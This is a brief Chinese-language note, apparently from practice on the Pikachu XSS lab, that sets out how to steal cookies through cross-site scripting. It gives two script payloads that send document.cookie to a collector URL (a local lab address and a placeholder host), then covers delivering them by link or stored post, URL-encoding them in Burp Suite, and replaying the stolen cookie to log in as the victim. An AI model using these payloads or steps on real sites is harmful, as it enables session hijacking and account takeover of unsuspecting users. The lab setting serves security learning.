1,发给攻击目标
<script>document.location='http://127.0.0.1:801/pikachu/pkxss/xcookie/cookie.php?cookie='+document.cookie;</script>
<script>document.location='http://urltogetcookie/cookie.php?cookie='+document.cookie;</script>
2,由cookie.php负责存储该cookie
3,只要目标能获得该域的cookie就行。也许没有登录,也许已经登录。总之有document.cookie即可
4,可以get方式(发链接),也可以是post方式(存储型)
5,若url形式,最好url编码后面的代码部分。用burpsuite之,decoder之encoder as URL
6,拿到cookie之后利用burpsuite改数据包之cookie进入系统。